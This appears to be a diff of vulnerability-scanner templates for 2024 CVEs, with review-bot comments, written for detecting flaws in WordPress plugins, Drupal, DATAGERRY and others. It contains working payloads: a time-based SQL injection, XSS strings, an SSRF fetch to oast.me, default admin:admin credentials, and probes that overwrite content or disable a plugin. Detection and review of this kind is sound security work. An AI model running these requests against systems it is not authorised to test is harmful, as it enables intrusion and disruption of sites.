- 'contains(tolower(body), "lobechat")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /api/proxy HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
http://oast.me
matchers:
- type: word
part: response
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100b6f794837ed630ad876ec08d70900f1d0923d863a28fe24a79bbd794c73691d902207a43d609d6fd37186ea6030b79d368f2d5b616cd4a8b71672448f8c584a903f3:922c64590222798bb761d5b6d8e72950
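Review bot: The matcher on the second request only succeeds if the target fetches `http://oast.me` and relays that site's landing page (`<h1> Interactsh Server </h1>`), so the verdict depends on a third-party host and on the target having outbound internet access. A target with filtered egress, or any change to that page, produces a silent negative that reads as "not vulnerable". I would document this above the request, e.g. `# a negative result is inconclusive when the target cannot reach oast.me`. Separately, `cvss-metrics` carries `PR:H` while the description says the flaw is reachable without logging in; one of the two should be checked against the advisory.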

@ -0,0 +1,134 @@
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39641
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
part: body
name: share_key
internal: true
json:
- '.wishlist.share_key'
- raw:
- |
@timeout: 20s
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and
# digest: 490a0046304402207690eca3604b0ae310218e3e09ed7e01283fe3cd0058c463ba97588995b8fe2c02201c44b9bac4f09f86ce9b93a397b2f8753abade9745a84a35132428a34c99c286:922c64590222798bb761d5b6d8e72950
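Review bot: The last request decides on a single timing sample, `duration>=6`, so a slow or heavily loaded site that takes six seconds to answer `get_products` for unrelated reasons is reported as a critical SQL injection. The other two DSL conditions (`application/json`, `product_id`) presumably hold for any normal response from that route and do not narrow the match. Comparing against a baseline request to the same route without the delay would make the finding trustworthy; at minimum add a comment such as `# single time-based sample: confirm manually before filing`. Note also that `http(3)` is a POST with `product_action` set to `addto`, so it appears to add an item to a wishlist on the target, which `info` does not mention.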

@ -0,0 +1,47 @@
id: CVE-2024-45440
info:
name: Drupal 11.x-dev - Full Path Disclosure
author: DhiyaneshDK
severity: medium
description: |
core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.
reference:
- https://senscybersecurity.nl/CVE-2024-45440-Explained/
- https://nvd.nist.gov/vuln/detail/CVE-2024-45440
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-45440
cwe-id: CWE-209
epss-score: 0.00046
epss-percentile: 0.17715
cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: drupal
product: drupal
shodan-query:
- http.component:"drupal"
- cpe:"cpe:2.3:a:drupal:drupal"
tags: cve,cve2024,drupal,exposure,error
http:
- method: GET
path:
- "{{BaseURL}}/core/authorize.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "getHashSalt"
- "RuntimeException"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022054ed249c58d1f97eacc44eec47d392c89f94f74b2c5b5e77d298817beb19de4302204074bcf02eae57de46bf5175d3bd645a995584246f4cf7349bd9f71e4246f905:922c64590222798bb761d5b6d8e72950

@ -0,0 +1,51 @@
id: CVE-2024-46627
info:
name: DATAGERRY - REST API Auth Bypass
author: gy741
severity: critical
description: |
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
impact: |
Allows unauthorized access to REST API
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46627
- https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
- https://datagerry.com/
- https://github.com/DATAGerry/
- https://github.com/d4lyw/CVE-2024-46627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-46627
cwe-id: CWE-284
epss-score: 0.00045
epss-percentile: 0.16328
metadata:
verified: true
max-request: 1
vendor: becon
product: datagerry
shodan-query: http.title:"datagerry"
tags: cve,cve2024,becon,datagerry,unauth,auth-bypass
http:
- method: GET
path:
- '{{BaseURL}}/rest/users/1/settings/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response_type":'
- '"model":'
- '"time":'
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c4392206bdcb5f022100c7c5849fa2e4cdc7240166da0a6077f3c93557cbded880103e8580c784fdb3f1:922c64590222798bb761d5b6d8e72950
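Review bot: The `matchers` list has no status check, unlike the sibling `datagerry-default-login` template. It passes on any JSON body containing `"response_type":`, `"model":` and `"time":`. Those look like fields of a generic response envelope, so if the API wraps a rejected request in the same envelope (not visible here, worth confirming against a patched instance), a fixed server would still be flagged critical. Adding `- type: status` / `status:` / `- 200` would tie the match to a successful unauthenticated read. The `description` (command execution) and `impact` (REST API access) also disagree, and `vendor: becon` does not match `BECN` in the description.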

@ -0,0 +1,70 @@
id: CVE-2024-5488
info:
name: SEOPress < 7.9 - Authentication Bypass
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
reference:
- https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
- https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-5488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5488
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass
flow: http(1) && http(2) && http(3)
variables:
marker: "{{randstr}}"
username: "admin"
http:
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'Sorry, you are not allowed to do that.'
internal: true
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':aaaaaa')}}
Content-Type: application/x-www-form-urlencoded
title={{marker}}&description={{marker}}
matchers:
- type: word
part: body
words:
- '"code":"success"'
internal: true
- raw:
- |
GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"title":"{{marker}}","description":"{{marker}}"'
# digest: 4a0a00473045022100c95d50e7ed0073b424b5b0259135b11ea7bdca7a18c8b8f5ec23b5cb197c95860220742e8b72bc5d7d64ffdc413ce427470f0b96f7c9a4cc53c5d0298cfa2efe112d:922c64590222798bb761d5b6d8e72950
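Review bot: The second request is a write: the `PUT` to `/wp-json/seopress/v1/posts/1/title-description-metas` replaces the SEO title and description of post 1 with `{{marker}}` on every vulnerable site scanned, and nothing in the template restores the previous values. That side effect is not stated anywhere in `info`, so an operator running the `cve` tag against production would alter live content without knowing. I would add `intrusive` to `tags` so the template can be excluded by policy, and state the change in `description`, e.g. `Note: a positive check overwrites the SEOPress title and description of post ID 1.` The `classification` block also has no `cwe-id`.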

@ -0,0 +1,68 @@
id: CVE-2024-6517
info:
name: Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting
author: s4e-io
severity: medium
description: |
The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.
reference:
- https://wpscan.com/vulnerability/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6517
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-6517
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09608
cpe: cpe:2.3:a:dotsquares:contact_form_7_math_captcha:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: dotsquares-wpteam
product: ds-cf7-math-captcha
framework: wordpress
publicwww-query: "/wp-content/plugins/ds-cf7-math-captcha"
tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/ds-cf7-math-captcha")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=dscf7_refreshcaptcha&tagname="<script>alert(document.domain)</script>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"<script>alert(document.domain)</script>'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a00483046022100b027a0561626761eec561001fce02cfe13c26cf0c84b572a1759bac3a823fa32022100f7a35b349e671f6462ac3fb1f3e55ccec74ab7572338ce94ea7deddc14bbc5d8:922c64590222798bb761d5b6d8e72950

@ -0,0 +1,77 @@
id: CVE-2024-7354
info:
name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
impact: |
Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
remediation: |
Update the plugin to Latest version. Fixed in 3.8.11.
reference:
- https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/
- https://nvd.nist.gov/vuln/detail/CVE-2024-7354
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-7354
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09629
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: ninjaforms
product: ninja_forms
framework: wordpress
fofa-query: body="/wp-content/plugins/ninja-forms"
publicwww-query: /wp-content/plugins/ninja-forms/
shodan-query: http.html:"/wp-content/plugins/ninja-forms/"
tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/ninja-forms"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nf-submissions&"><script>alert(document.domain)</script>=2 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"><script>alert(document.domain)</script>'
- type: word
part: content_type_2
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100ebe3e3fa989e9981bc9b9c167b1cba1c8f1b70a6a6ee428a03e421eb8ee1fc2f0220422da9f508638f3e1e59189edcd58268db1d17e273dc400b89ce3bcfe0e0c92e:922c64590222798bb761d5b6d8e72950
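Review bot: The login request uses `{{username}}` and `{{password}}`, but the template defines no `variables` and its `tags` lack `authenticated`. In a scan without credentials the `wp-login.php` POST cannot succeed, and the result is a quiet negative rather than a skipped template. Add `authenticated` to `tags` and say in `description` that an administrator account must be supplied. The `impact` text ("gain unauthorized access to sensitive information") is generic and does not describe a reflected XSS that needs a logged-in victim. It is also unclear from the hunk which response the unsuffixed `status` matcher applies to, since it sits beside `body_2` and `content_type_2`.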

@ -0,0 +1,41 @@
id: CVE-2024-7714
info:
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
author: s4e-io
severity: medium
description: |
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
remediation: Fixed in 2.1.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-7714
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 1
vendor: ays-chatgpt-assistant-team
product: ays-chatgpt-assistant
framework: wordpress
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
matchers:
- type: dsl
dsl:
- 'regex("^true$", body)'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950
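Review bot: The probe is the disruptive action itself. The GET calls `function=ays_chatgpt_disconnect`, which per the `description` disconnects the plugin from OpenAI and disables it, so each positive result leaves the scanned site's assistant out of service. Nothing in `tags` or elsewhere in `info` warns the operator of this. I would add `intrusive` to `tags` and a line in `description` such as `Note: a positive check disconnects the plugin from OpenAI; the site owner must reconnect it.` Whether the missing access control can be confirmed without changing state is not visible from this hunk and is worth checking before merge.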

@ -0,0 +1,46 @@
id: datagerry-default-login
info:
name: Datagerry - Default Login
author: gy741
severity: high
description: |
Datagerry was using default username and password was discovered.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"datagerry"
tags: datagerry,default-login
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
POST /rest/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user_name":"{{username}}","password":"{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"token":'
- '"token_issued_at":'
- '"token_expire":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100cf8cc043be4a0b3dc195acf9b6ef53e752608e9095d2443fe3783cd935d4bec0022047df60ad555032dc21231c6899cf2213cef306d8841ed6d22810a8531d6e5f60:922c64590222798bb761d5b6d8e72950
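Review bot: The `description` is ungrammatical and gives a responder nothing to act on; `Datagerry accepts the default administrator credentials (admin:admin).` states what the match means. A `remediation` entry telling the operator to change the default password would complete it. The template also has no `reference`, so the origin of the default pair cannot be checked from the file.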

@ -0,0 +1,41 @@
id: aspnetcore-dev-env
info:
name: ASP.NET Core Development Environment - Exposure
author: Mys7ic
severity: info
description: |
The ASP.NET Core application is running in Development mode, which could exposes detailed error messages and stack traces on the '/Error' page.
impact: |
Exposing detailed error messages and stack traces can reveal sensitive information such as server configurations, file paths, source code snippets, and other debug information. Attackers can use this information to identify vulnerabilities and compromise the application or underlying systems.
remediation: |
Set the 'ASPNETCORE_ENVIRONMENT' environment variable to 'Production' and ensure that detailed error messages are not exposed to end-users.
reference:
- https://docs.microsoft.com/en-us/aspnet/core/fundamentals/environments
metadata:
max-request: 1
vendor: microsoft
product: asp.net-core
shodan-query: html:"ASPNETCORE_ENVIRONMENT"
verified: true
tags: misconfig,aspnetcore,exposure
http:
- method: GET
path:
- "{{BaseURL}}/Error"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "<strong>ASPNETCORE_ENVIRONMENT</strong> environment variable to <strong>Development</strong>"
- type: word
part: body
words:
- "ASPNETCORE_ENVIRONMENT"
- "<environment include=\"Development\">"
condition: and
# digest: 490a0046304402202067b5f6070703eaccb234d9fadb99bbfd78c2791b0073c494f498788060e8c00220755457d24f6d89d0f60a1cb5227c29412c43da39da4fb7c53c17460ecd6b2f81:922c64590222798bb761d5b6d8e72950
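Review bot: The first matcher's string, `<strong>ASPNETCORE_ENVIRONMENT</strong> environment variable to <strong>Development</strong>`, looks like the static help text of the scaffolded ASP.NET Core `Error` page. As far as I know that text is rendered whenever `/Error` is requested, and the page is normally wired up as the exception handler only outside Development. If that is right, with `matchers-condition: or` the template reports the production configuration it means to recommend. Please confirm against an application running with `ASPNETCORE_ENVIRONMENT=Production`; a marker that appears only on the developer exception page would be a sounder signal. The description's "could exposes" should read "could expose".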

@ -0,0 +1,28 @@
id: wiki-js-detect
info:
name: Wiki.js - Detect
author: righettod
severity: info
description: |
Wiki.js was detected.
reference:
- https://js.wiki/
metadata:
verified: true
max-request: 1
shodan-query: http.html:"wiki.js"
tags: tech,wiki-js,detect
http:
- method: GET
path:
- "{{BaseURL}}/_assets/js/app.js"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(to_lower(body), "wiki.js - wiki.js.org", "window.wiki")'
condition: and
# digest: 490a00463044022001a724774fd5edf512cecc0776374a7fe5dd50c53ae8c0fa9967bfe6fbbd299c02201363f742a5f7cff6393c7d7f704f808f73e20b3187b97ff420def6a38fa92cc8:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f855b969632608830c492ebb1574d9a38314813937beb3811c747baad140d7d2022100d20da679c343c7a07adc8cb885e7196d4248248710f6655e45d69ad8b896218a:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207961b980256585c81f22b4cc1dae99abeb025da35ed2f0e86116695fee505c59022100bc6a72b26e8dee2f7a66620d0599fcd75fbe6f8cc66a03785ba5b24c141974f4:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008c0268a0f23aa612c79c8e1905f8d79904f15447578072c279dd9e0f7a7cd00b022100849f4cae589820bf482e6f51498b4797b90b2734f3e3ce118d0467df9e89ecac:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100916e279374637d5775ccdba2a2a268493b4b9790d900e73b85cfe0c565db5b8c022100921532a775e58fcbda8f70aaef89cb5148ac13b5158fd149881f02e0fde56ea0:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ba6e7260be797adb3912e17342400941ecf803e5f3a928b7f11d6137574ce1e2022010210e3a468f9a4578d873df24ac2cbecc2ae79ffbb9b3998432d69e125ed334:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220528133e793081e203839b1b92b021e3deb5d7cf37ae7a4f41c99c57db9c778ac022100cca133f4c9ec02c70061a8f2c42edc97a96accaad189e8dfa1ae2121e023d1ea:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a3554e4b70b2c4e0be5ef5260ab28e213288f158649d8475804647fc21b96cd2022100c8fc7c53d1ced043dd524edc5ed4ca025524e11de86596e5a1dc5512e7504fcf:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207da31e410e136b94150036d421dfb4661ab9c7c3dbba091c79132be7e4be4573022035a458b8bdd8696d3144bbc7fe111adcfc5d101256ca349afd1d8dc4dcd1b93a:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ae8f43d308d940b28bdc931b082b4696027928f8533b0896ed1f30f3912b064c022100ac3a3954141297ac5c07fdfe67b1ce32274483530b19776ed6f910feb185a557:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220323689f88c73d49bf3c01c82d5dbff2af6ba7fcacf57b4800eae1958d94f59b602206a980debf4d864f21c7762c8d6b7e2f2927db44caa025b579504cfca20fc6aa9:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502200736c6a53a052da3b5c3b1742fe37ee939f9c1903e37000d1cef13037721830f022100d648f07964aca2802d5062f475564c211545442f97b474438bd0c82b7bec4cf8:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100fb2bc8ba830af39fd7f788d90e8ae1dc8f1ce5ea642bf186514bdbe9bcd09a0d022100c1029536258da4e58ba36151406f8cdd25273e0371ca1eff1e64c1be0af38c90:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206c812725e38e325fccfb3c6a8f4012594ddbbde62601fcef48a662633054e35a022100d7b8a66c83eb4ce12df94c961d6a41685a1d8057011ae42f7988ee8ecf97aabd:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210099e58b8cd84b5c6a5f514675878b05d842eeacdc55f6dc06411be854b89a0a8e02205b743f909d207586777c9c185eb06b22f8528946332b7ef9cac0c73f12c6eb61:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210081164f01918cb5ddd9865154b4f08690bf2c1918f0dc30f01fa134464e525fd102200a318863e42e3506f6ed35215454b8db49624a000c88a707a1dd8cfa04531cee:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220039a8d82df5c96f0e9303e96733b16e2075a00d90a77131e98b536fdcc8b3973022100b1d12dd0b98fe344b8389b991c3457bff68790f93a4917c05edaddcc705ac59e:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206f711c2c80fb94b3349fa0ded8d628d4bcad405807d40d90c69660ebb749c00c022100a36479be2c9a03866ea68c25f83a442574b27f03117b6525d533d9f191413637:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022026cab7478f43ea5a288155f0d5dff8850cdd0c51f14a07474ec3d20f3256558702200690da4c8ea4b05ca8510b1983fe09e0deec5caa68979c9a3b5c284cbb2c7182:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210083675cfa91dae14f4ca39b9634d76e983aeb78b4838a77e956170852692c2949022100d01f913cb6c26942d4144592bb8caed79481d07316412b1bbe46729c79c047dd:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204e22bc10d6eb6ef88da876f17b93f0b9f33b83a579e04a7bb0aec6013acfc4ca022017a2a686e84914fd4d8ea7f9cb09832d8578573e76bc54589291366f9cb360a2:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206b7ac475be191ea4ea310c9c8b92eef7d33834161512b51e49ecae1acba0168a022007956a03082c608b4e177b6ef24f32ef5e180cd3662e74114aadf0847cfdf109:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008b6b3ca35532a15123c6626c0f748e7d8dd51e5485ac123f4a48530432515cd4022100f2aafcae16191f04840ee38f19b494b64f591fd8fbbf369c3c9090626dd4538f:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022050dff0f219f4bccd20c34743fff7cdf2a10cab982b88513251a31995e7c38c36022100b387791302a3df2d8cfdb58fcabe5c6e4c57f7fee62b4741e4ed55588216352d:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402200ede9ddd3f8ed458120fcb7b296579677ebc7a346c7c3e38f7d5fa01a0d6ee3102200ccff089eedc545a326d5ff80aeaf574e1773c6ac5bd40acd2e9cedf6d8a5a6d:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202718a28dfa509d25ee22cf98ee8bcfc71d167a4251d92ee6a183b9b831ea5edc022100f71dd2888542db050070d806b3a71e66dcb02197e0556c37f466ce2f0b26111b:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204d6a97bfb3589b47d5191337546b47de0bb81961602592af14b7a33a7d57a294022044cf32f0347d0b642a356e94a19c3c24253f49def0fa68e50350a88fd3a0ff6a:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
